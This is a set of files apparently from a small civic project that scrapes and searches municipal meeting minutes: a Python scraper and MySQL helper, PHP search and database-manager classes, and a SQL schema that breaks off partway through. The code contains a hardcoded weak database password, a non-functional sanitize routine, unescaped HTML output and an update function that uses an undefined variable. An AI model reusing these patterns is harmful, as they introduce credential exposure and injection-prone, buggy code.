pdftextscrubbed = scrubtext(pdftext)\n _tokens = nltk.word_tokenize(pdftextscrubbed)\n tokens = nltk.FreqDist(word.lower() for word in _tokens)\n success,suborgid = getsuborg(pdftext[:HEADERLENGTH],orgid)\n if success == True:\n report(\"info\",\"Adding Doc and Word Histogram Data to Database.\")\n docid = savedoc(suborgid,orgid,link,docdate,docname,texthash,pdftext,tokens,False)\n report(\"info\",\"Successfully Parsed And Added Document #{0}\\n\".format(docid))\n else:\n report(\"error\",\"Unable to Decode Suborganization from PDF document.\")\n report(\"info\",\"Adding Doc and Word Histogram Data to Database as Orphan.\")\n docid = savedoc(suborgid,orgid,link,docdate,docname,texthash,pdftext,tokens,True)\n report(\"info\",\"Adding `{0}` to orphan list.\\n\")\n else:\n report(\"warning\",\"Unable to Parse PDF Into Text.\")\n report(\"info\",\"Adding `{0}` to ignore list.\\n\".format(link))\n addignore(link,urlid)\n os.remove(filename)\n\n print \"\\nApplication Exiting ...\\n\"\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n"
},
{
"alpha_fraction": 0.5640449523925781,
"alphanum_fraction": 0.5647940039634705,
"avg_line_length": 33.675323486328125,
"blob_id": "f2910a9a84544aa46dc1618dacb7577bae75038d",
"content_id": "5fa140798a2a75287d02ed3659711d141af84bcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2670,
"license_type": "no_license",
"max_line_length": 318,
"num_lines": 77,
"path": "/scripts/runs.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import MySQLdb as mdb\nimport _mysql as mysql\nimport re\n\nclass runs:\n\n __settings = {}\n __con = False\n\n def __init__(self):\n configfile = \"sqlcreds.txt\"\n f = open(configfile)\n for line in f:\n # skip comment lines\n m = re.search('^\\s*#', line)\n if m:\n continue\n\n # parse key=value lines\n m = re.search('^(\\w+)\\s*=\\s*(\\S.*)$', line)\n if m is None:\n continue\n\n self.__settings[m.group(1)] = m.group(2)\n f.close()\n\n # create connection\n self.__con = mdb.connect(host=self.__settings['host'], user=self.__settings['username'], passwd=self.__settings['password'], db=self.__settings['database'])\n\n def __sanitize(self,valuein):\n if type(valuein) == 'str':\n valueout = mysql.escape_string(valuein)\n else:\n valueout = valuein\n return valuein\n\n def add(self,rundt,scrapername,successful,organizationid,suborganizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"INSERT INTO runs(rundt,scrapername,successful,organizationid,suborganizationid) VALUES(%s,%s,%s,%s,%s)\",(self.__sanitize(rundt),self.__sanitize(scrapername),self.__sanitize(successful),self.__sanitize(organizationid),self.__sanitize(suborganizationid)))\n cur.close()\n newid = cur.lastrowid\n return newid\n\n def get(self,runid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM runs WHERE runid = %s\",(runid))\n row = cur.fetchone()\n cur.close()\n\n def getall(self):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM runs\")\n rows = cur.fetchall()\n cur.close()\n\n _runs = []\n for row in rows:\n _runs.append(row)\n\n return _runs\n\n def delete(self,runid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"DELETE FROM runs WHERE runid = %s\",(runid))\n cur.close()\n\n def update(self,runid,rundt,scrapername,successful,organizationid,suborganizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"UPDATE runs SET rundt = %s,scrapername = %s,successful = %s,organizationid = %s,suborganizationid = %s WHERE runid = %s\",(self.__sanitize(rundt),self.__sanitize(scrapername),self.__sanitize(successful),self.__sanitize(organizationid),self.__sanitize(suborganizationid),self.__sanitize(runid)))\n cur.close()\n\n##### Application Specific Functions #####\n"
},
{
"alpha_fraction": 0.5473799109458923,
"alphanum_fraction": 0.5502183437347412,
"avg_line_length": 27.27777862548828,
"blob_id": "ad07e88f0732dbd1f804b3e3c2706396a3724456",
"content_id": "b2bfcd4cdd8ff8ba15c0e1545b77a291dc42676b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4580,
"license_type": "no_license",
"max_line_length": 237,
"num_lines": 162,
"path": "/web/search.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"_header.php\");\n?>\n\n\t<script src=\"http://code.jquery.com/jquery-latest.js\"></script>\n\t\n\t<script type=\"text/javascript\">\n\t</script>\n\n\t<div class=\"searchwrapper\">\n\t\t<form name=\"input\" action=\"search.php\" method=\"get\">\n\n\t\t\t<div class=\"searchbox\">\n\t\t\t\tEnter a Search Term</br>\n\t\t\t\t<input type=\"text\" id=\"keyword\" name=\"keyword\" size=\"80\" value=\"\"></br>\n\t\t\t</div>\n\t\t\t\n\t\t\t<div class=\"orgselectbox\">\n\t\t\t\tSelect a Specific Organization</br>\n\t\t\t\t<select id=\"organization\" name=\"organization\">\n\t\t\t\t\n\t\t\t\t\t<?php\n\t\t\t\t\t\n\t\t\t\t\t\trequire_once(\"./tools/OrganizationsManager.class.php\");\n\t\t\t\t\t\t\n\t\t\t\t\t\t$orgmgr = new OrganizationsManager();\n\t\t\t\t\t\t$orgs = $orgmgr->getall();\n\t\t\t\t\t\tforeach($orgs as $org)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\techo '<option value=\"' . $org->organizationid . '\">' . $org->name . '</option>\\n';\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t?>\n\t\t\t\t\n\t\t\t\t</select>\n\t\t\t</div>\n\t\t\t\n\t\t\t<div class=\"smallpadding\">\n\t\t\t\t<input type=\"submit\" id=\"search\" value=\"Search\"></br>\n\t\t\t</div>\n\t\t\t\n\t\t</form>\n\t</div>\n\n\t<div class=\"searchwrapper\">\n\n\t\t<div id=\"searchresults\" class=\"searchresults\">\n\t\t\n\t\t\t<?php\n\t\t\t\n\t\t\t\t// see if we actually are performing a search\n\t\t\t\tif( isset($_GET['keyword']) && isset($_GET['organization']) )\n\t\t\t\t{\n\t\t\t\t\t\n\t\t\t\t\t// decode page number, if set\n\t\t\t\t\tif( isset($_GET['page']) )\n\t\t\t\t\t{\n\t\t\t\t\t\t$page = intval($_GET['page']);\n\t\t\t\t\t\tif( $page < 1 )\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$page = 1;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t$page = 1;\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\t// decode search term and org id\n\t\t\t\t\t$keyword = $_GET['keyword'];\n\t\t\t\t\t$organizationid = $_GET['organization'];\n\t\t\t\n\t\t\t\t\t//echo \"Searching for '\" . $keyword . \"' within org #\" . $organizationid . \", returning page #\" . $page . \" ...</br>\";\n\t\t\t\n\t\t\t\t\trequire_once(\"./tools/WordsManager.class.php\");\n\t\t\t\t\trequire_once(\"./tools/DocumentsManager.class.php\");\n\t\t\t\t\trequire_once(\"./tools/SuborganizationsManager.class.php\");\n\t\t\t\t\t\n\t\t\t\t\t$docmgr = new DocumentsManager();\n\t\t\t\t\t$wordsmgr = new WordsManager();\n\t\t\t\t\t$sorgmgr = new SuborganizationsManager();\n\t\t\t\t\t\n\t\t\t\t\t//echo \"Organization ID = \" . $organizationid . \"<br>\";\n\t\t\t\t\t//echo \"Keyword = \" . $keyword . \"<br>\";\n\t\t\t\t\t\n\t\t\t\t\t$retwords = $wordsmgr->search($organizationid,$keyword,$page);\n\t\t\t\t\t$wordcount = $wordsmgr->getcount($organizationid, $keyword);\n\t\t\t\t\n\t\t\t\t\t// get the docs\n\t\t\t\t\t$docs = array();\n\t\t\t\t\tforeach($retwords as $retword)\n\t\t\t\t\t{\n\t\t\t\t\t\t$doc = $docmgr->get($retword->documentid);\n\t\t\t\t\t\t$docs[] = $doc;\n\t\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\t/*\n\t\t\t\t\t// create words array\n\t\t\t\t\t$words = array();\n\t\t\t\t\tforeach($retword as $word)\n\t\t\t\t\t{\n\t\t\t\t\t\t$words[$word->word] = (object) array('documentid' => $word->documentid, 'frequency' => $word->frequency);\n\t\t\t\t\t}\n\t\t\t\t\t*/\n\t\t\t\t\t\n\t\t\t\t\t// create suborg dictionary\n\t\t\t\t\t$suborgs = $sorgmgr->getall();\n\t\t\t\t\t$suborgdict = array();\n\t\t\t\t\tforeach($suborgs as $suborg)\n\t\t\t\t\t{\n\t\t\t\t\t\t$suborgdict[$suborg->suborganizationid] = (object) array( 'name' => $suborg->name, 'websiteurl' => $suborg->websiteurl );\n\t\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\t//echo \"Count = \" . $wordcount . \"<br>\";\n\t\t\t\t\n\t\t\t\t\t//echo json_encode($retwords);\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t$start = (($page - 1) * 10)+1;\n\t\t\t\t\tif( $start + 9 > $wordcount )\n\t\t\t\t\t\t$end = $wordcount;\n\t\t\t\t\telse\n\t\t\t\t\t\t$end = $start + 9;\n\t\t\t\t\t\n\t\t\t\t\techo '<div class=\"srtop\">';\n\t\t\t\t\t\n\t\t\t\t\techo '<a href=\"' . $suborgdict[$doc->suborganizationid]->websiteurl . '\">' . $suborgdict[$doc->suborganizationid]->name . '</a>';\n\t\t\t\t\t\n\t\t\t\t\tif( $wordcount == 1 )\n\t\t\t\t\t\techo '<div class=\"srcounts\"><div class=\"righttext\">Displaying 1 total result.</div></div>';\n\t\t\t\t\telse\n\t\t\t\t\t\techo '<div class=\"srcounts\"><div class=\"righttext\">Displaying ' . $start . ' to ' . $end . ' of ' . $wordcount . ' total results.</div></div>';\n\n\t\t\t\t\techo \"</div>\\n\";\n\t\t\t\t\n\t\t\t\t\t// print all of the results to the page\n\t\t\t\t\tforeach($docs as $doc)\n\t\t\t\t\t{\n\t\t\t\t\t\techo '<div class=\"searchresult\">';\n\t\t\t\t\t\techo '<div class=\"srheader\"><a href=\"' . $doc->sourceurl . '\">' . $doc->name . '</a> - ' . $doc->documentdate . '</div>';\n\t\t\t\t\t\techo '<div class=\"srurlheader\">' . $doc->sourceurl . '</div></br>';\n\t\t\t\t\t\techo '<div class=\"srpreviewtext\">\"... that the floor plan for this house is identical to the last one the Planning Board approved. He passed around a sample of the exterior color, which members agreed was aesthetically ...\"</div>';\n\t\t\t\t\t\t//echo '<div class=\"srsubheader\"><a href=\"' . $suborgdict[$doc->suborganizationid]->websiteurl . '\">' . $suborgdict[$doc->suborganizationid]->name . '</a></div>';\n\t\t\t\t\t\techo \"</div>\\n\\n\";\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t//echo \"Looks like there was an error, try reloading the page.\";\n\t\t\t\t}\n\t\t\t?>\n\t\t\t\n\t\t</div>\n\n\t</div>\n\n<?php\n\trequire_once(\"_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5906432867050171,
"alphanum_fraction": 0.5912002325057983,
"avg_line_length": 27.95967674255371,
"blob_id": "a50d7cad73c932d2c6998b3956757f26dfc4bf7e",
"content_id": "2c207c162ca550b970026ae5ce770ec70f249608",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3591,
"license_type": "no_license",
"max_line_length": 278,
"num_lines": 124,
"path": "/web/tools/UsersManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass UsersManager\n\t{\n\t\tfunction add($username,$passwordhash,$displyname,$emailaddress,$verificationcode,$verified)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO users(username,passwordhash,displyname,emailaddress,verificationcode,verified) VALUES(?,?,?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssssss\", $username,$passwordhash,$displyname,$emailaddress,$verificationcode,$verified);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('userid' => $row['userid'],'username' => $row['username'],'passwordhash' => $row['passwordhash'],'displyname' => $row['displyname'],'emailaddress' => $row['emailaddress'],'verificationcode' => $row['verificationcode'],'verified' => $row['verified']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($userid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM users WHERE userid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $userid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('userid' => $row['userid'],'username' => $row['username'],'passwordhash' => $row['passwordhash'],'displyname' => $row['displyname'],'emailaddress' => $row['emailaddress'],'verificationcode' => $row['verificationcode'],'verified' => $row['verified']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM users';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('userid' => $row['userid'],'username' => $row['username'],'passwordhash' => $row['passwordhash'],'displyname' => $row['displyname'],'emailaddress' => $row['emailaddress'],'verificationcode' => $row['verificationcode'],'verified' => $row['verified']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($userid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM users WHERE userid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $userid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($username,$passwordhash,$displyname,$emailaddress,$verificationcode,$verified)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE users SET username = ?,passwordhash = ?,displyname = ?,emailaddress = ?,verificationcode = ?,verified = ? WHERE userid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssssss\", $username,$passwordhash,$displyname,$emailaddress,$verificationcode,$verified, $userid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.614052951335907,
"alphanum_fraction": 0.6145620942115784,
"avg_line_length": 30.677419662475586,
"blob_id": "2231e8d64c509565de67e6013c97d955a6f8978c",
"content_id": "5295dac1cc3933de78a9b8d5179120d43b3a985c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3928,
"license_type": "no_license",
"max_line_length": 325,
"num_lines": 124,
"path": "/web/tools/SuborganizationsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass SuborganizationsManager\n\t{\n\t\tfunction add($organizationid,$name,$parsename,$websiteurl,$documentsurl,$scriptname,$dbpopulated)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO suborganizations(organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated) VALUES(?,?,?,?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssssss\", $organizationid,$name,$parsename,$websiteurl,$documentsurl,$scriptname,$dbpopulated);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'name' => $row['name'],'parsename' => $row['parsename'],'websiteurl' => $row['websiteurl'],'documentsurl' => $row['documentsurl'],'scriptname' => $row['scriptname'],'dbpopulated' => $row['dbpopulated']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($suborganizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM suborganizations WHERE suborganizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $suborganizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'name' => $row['name'],'parsename' => $row['parsename'],'websiteurl' => $row['websiteurl'],'documentsurl' => $row['documentsurl'],'scriptname' => $row['scriptname'],'dbpopulated' => $row['dbpopulated']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM suborganizations';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'name' => $row['name'],'parsename' => $row['parsename'],'websiteurl' => $row['websiteurl'],'documentsurl' => $row['documentsurl'],'scriptname' => $row['scriptname'],'dbpopulated' => $row['dbpopulated']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($suborganizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM suborganizations WHERE suborganizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $suborganizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($organizationid,$name,$parsename,$websiteurl,$documentsurl,$scriptname,$dbpopulated)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE suborganizations SET organizationid = ?,name = ?,parsename = ?,websiteurl = ?,documentsurl = ?,scriptname = ?,dbpopulated = ? WHERE suborganizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssssssss\", $organizationid,$name,$parsename,$websiteurl,$documentsurl,$scriptname,$dbpopulated, $suborganizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.6023908257484436,
"alphanum_fraction": 0.6042099595069885,
"avg_line_length": 28.60769271850586,
"blob_id": "db65aa7b7f074f776210294aed88a311864202c3",
"content_id": "510940d33e592b0e5b23305beb797e9559367194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3848,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 130,
"path": "/web/tools/old/SearchManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\n\trequire_once(\"DatabaseTool.class.php\");\n\t\n\tclass SearchManager\n\t{\n\t\n\t\tfunction GetSearchResultCount($searchterm, $organizationid)\n\t\t{\n\t\t\tdprint( \"GetSearchResultCount() Start.\" );\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool();\n\t\t\t\n\t\t\t\t$query = 'select count(documents.documentid) as count ';\n\t\t\t\t$query = $query . 'from documents ';\n\t\t\t\t$query = $query . 'inner join words on words.documentid = documents.documentid ';\n\t\t\t\t$query = $query . 'inner join organizations on documents.organizationid = organizations.organizationid ';\n\t\t\t\t$query = $query . 'inner join suborganizations on documents.suborganizationid = suborganizations.suborganizationid ';\n\t\t\t\t$query = $query . 'where documents.organizationid = ? and words.word = ?';\n\t\t\t\t\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ss\", $organizationid,$searchterm);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$count = count($results);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\t\n\t\t\tdprint(\"GetSearchResultCount() Done.\");\n\t\t\t\n\t\t\treturn $count;\n\t\t}\n\t\n\t\tfunction PerformSearch($searchterm, $organizationid, $page)\n\t\t{\n\t\t\tdprint( \"PerformSearch() Start.\" );\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool();\n\t\t\t\n\t\t\t\t$query = 'select documents.name as docname, documents.scrapedate as scrapedate, documents.documentdate as documentdate, documents.sourceurl as sourceurl, ';\n\t\t\t\t$query = $query . 'organizations.name as orgname, ';\n\t\t\t\t$query = $query . 'suborganizations.name as suborgname, suborganizations.websiteurl as websiteurl ';\n\t\t\t\t$query = $query . 'from documents ';\n\t\t\t\t$query = $query . 'inner join words on words.documentid = documents.documentid ';\n\t\t\t\t$query = $query . 'inner join organizations on documents.organizationid = organizations.organizationid ';\n\t\t\t\t$query = $query . 'inner join suborganizations on documents.suborganizationid = suborganizations.suborganizationid ';\n\t\t\t\t$query = $query . 'where documents.organizationid = ? and words.word = ? order by documents.documentdate limit 10 offset ?';\n\t\t\t\t\n\t\t\t\t//echo $query;\n\t\t\t\t\n\t\t\t\tif( $page > 1 )\n\t\t\t\t\t$limit = \"offset \" . intval( ($page-1) * 10 );\n\t\t\t\telse\n\t\t\t\t\t$limit = 0;\n\t\t\t\t\t\n\t\t\t\t//echo \"-- \" . $limit . \" --\";\n\t\t\t\t\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $organizationid,$searchterm,$limit);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$searchresults = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$searchresult = (object) array( 'docname' => $row['docname'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'scrapedate' => $row['scrapedate'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'documentdate' => $row['documentdate'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'sourceurl' => $row['sourceurl'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'orgname' => $row['orgname'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'suborgname' => $row['suborgname'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'websiteurl' => $row['websiteurl']\n\t\t\t\t\t\t\t\t\t\t\t\t );\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t$searchresults[] = $searchresult;\n\t\t\t\t}\n\t\n\t\t\t\t$this->RecordSearch($searchterm,$organizationid);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\t\n\t\t\tdprint(\"PerformSearch() Done.\");\n\t\t\t\n\t\t\treturn $searchresults;\n\t\t}\n\t\n\t\tfunction RecordSearch($searchterm,$organizationid)\n\t\t{\n\t\t\tdprint( \"RecordSearch() Start.\" );\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool();\n\t\t\t\n\t\t\t\t$datetime = date(\"Y-m-d H:i:s\");\n\t\t\t\n\t\t\t\t$query = 'INSERT INTO searches(searchterm,searchdt,organizationid) values(?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $searchterm,$datetime,$organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\t\n\t\t\tdprint(\"RecordSearch() Done.\");\n\t\t}\n\t\n\t}\n\n?>"
},
{
"alpha_fraction": 0.7156004905700684,
"alphanum_fraction": 0.7438141107559204,
"avg_line_length": 37.52325439453125,
"blob_id": "8d8750055d19cb5cdab3bdba6c7d5ff07e39a5a0",
"content_id": "8f4e6f567fc714441d0a8940ca5bf73a2f44c348",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 6628,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 172,
"path": "/db/create_db.sql",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "drop database monroeminutesdb;\ncreate database monroeminutesdb;\n\ngrant usage on monroeminutesdb.* to mmuser identified by 'password123%%%';\n\ngrant all privileges on monroeminutesdb.* to mmuser;\n\nuse monroeminutesdb;\n\ncreate table users(\nuserid int not null auto_increment primary key,\nusername varchar(255) not null,\npasswordhash varchar(255) not null,\ndisplyname varchar(255) not null,\nemailaddress varchar(255) not null,\nverificationcode varchar(255) not null,\nverified bool not null\n);\n\ncreate table permissions(\npermissionid int not null auto_increment primary key,\nisadmin bool not null,\ncanlogin bool not null\n);\n\ncreate table actions(\nactionid int not null auto_increment primary key,\nuserid int not null,\nforeign key (userid) references users(userid),\nactiontype varchar(255) not null,\npagename varchar(255) not null,\ndescription text not null\n);\n\ncreate table organizations(\norganizationid int not null auto_increment primary key,\nname varchar(255) not null,\ntype varchar(255) not null,\nwebsiteurl text\n);\n\ncreate table suborganizations(\nsuborganizationid int not null auto_increment primary key,\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nname text,\nparsename text,\nwebsiteurl text,\ndocumentsurl text,\nscriptname text,\ndbpopulated bool not null\n);\n\ncreate table scrapeurls(\nscrapeurlid int not null auto_increment primary key,\nurl text not null,\nname varchar(255) not null,\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nenabled bool not null\n);\n\ncreate table ignoreurls(\nignoreurlid int not null auto_increment primary key,\nurl text not null,\nignoredt datetime not 